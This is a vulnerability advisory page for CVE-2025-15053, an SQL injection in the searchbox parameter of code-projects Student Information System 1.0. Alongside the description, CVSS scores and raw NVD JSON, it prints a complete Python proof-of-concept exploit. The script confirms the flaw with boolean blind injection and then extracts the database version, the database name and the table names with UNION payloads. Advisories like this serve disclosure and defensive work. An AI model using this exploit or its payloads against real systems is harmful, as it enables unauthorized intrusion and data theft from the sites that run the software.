Security Vulnerability Report
中文
CVE-2025-15053 CVSS 7.3 HIGH

CVE-2025-15053

Published: 2025-12-24 02:15:53
Last Modified: 2026-04-29 01:00:02
Source: [email protected]

Description

A flaw has been found in code-projects Student Information System 1.0. This issue affects some unknown processing of the file /searchresults.php. Executing manipulation of the argument searchbox can lead to sql injection. The attack may be performed from remote. The exploit has been published and may be used.

CVSS Details

CVSS Score
7.3
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:fabian:student_information_system:1.0:*:*:*:*:*:*:* - VULNERABLE
code-projects Student Information System 1.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2025-15053 SQL Injection PoC # Target: code-projects Student Information System 1.0 # Endpoint: /searchresults.php # Parameter: searchbox def exploit_sqli(target_url, payload): """ Exploit SQL injection vulnerability in searchresults.php Args: target_url: Base URL of the vulnerable application payload: SQL injection payload to inject Returns: Response from the server """ params = { 'searchbox': payload } try: response = requests.get(f'{target_url}/searchresults.php', params=params, timeout=10) return response except requests.exceptions.RequestException as e: print(f'[!] Error: {e}') return None def extract_db_version(target_url): """Extract database version using UNION-based injection""" payload = "' UNION SELECT NULL,version(),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL---" print(f'[*] Extracting database version...') return exploit_sqli(target_url, payload) def extract_database_name(target_url): """Extract current database name""" payload = "' UNION SELECT NULL,database(),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL---" print(f'[*] Extracting database name...') return exploit_sqli(target_url, payload) def extract_tables(target_url): """Extract table names from information_schema""" payload = "' UNION SELECT NULL,group_concat(table_name),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM information_schema.tables WHERE table_schema=database()---" print(f'[*] Extracting table names...') return exploit_sqli(target_url, payload) def boolean_blind_injection(target_url): """Boolean-based blind SQL injection to confirm vulnerability""" true_payload = "' AND 1=1---" false_payload = "' AND 1=2---" print(f'[*] Testing boolean blind injection...') true_resp = exploit_sqli(target_url, true_payload) false_resp = exploit_sqli(target_url, false_payload) if true_resp and false_resp: if len(true_resp.text) != len(false_resp.text): print('[+] Boolean blind injection confirmed!') return True return False def main(): if len(sys.argv) < 2: print('Usage: python cve-2025-15053.py <target_url>') print('Example: python cve-2025-15053.py http://target.com/student-info-system') sys.exit(1) target_url = sys.argv[1].rstrip('/') print('=' * 60) print('CVE-2025-15053 SQL Injection Exploit') print('Target: Student Information System 1.0') print('=' * 60) # Confirm vulnerability if boolean_blind_injection(target_url): print('[+] Vulnerability confirmed!') # Extract information extract_db_version(target_url) extract_database_name(target_url) extract_tables(target_url) else: print('[-] Vulnerability not confirmed or target not vulnerable') if __name__ == '__main__': main()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-15053", "sourceIdentifier": "[email protected]", "published": "2025-12-24T02:15:52.993", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A flaw has been found in code-projects Student Information System 1.0. This issue affects some unknown processing of the file /searchresults.php. Executing manipulation of the argument searchbox can lead to sql injection. The attack may be performed from remote. The exploit has been published and may be used."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 3.4}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "baseScore": 7.5, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-74"}, {"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:fabian:student_information_system:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "8802E862-B24D-4F46-9DA1-A2817CF803D8"}]}]}], "references": [{"url": "https://code-projects.org/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/i4G5d/CRITICAL-SEVERITY-VULNERABILITY-REPORT-Widespread-SQLI", "source": "[email protected]", "tags": ["Exploit", "Mitigation", "Third Party Advisory"]}, {"url": "https://vuldb.com/?ctiid.337859", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.337859", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.720796", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.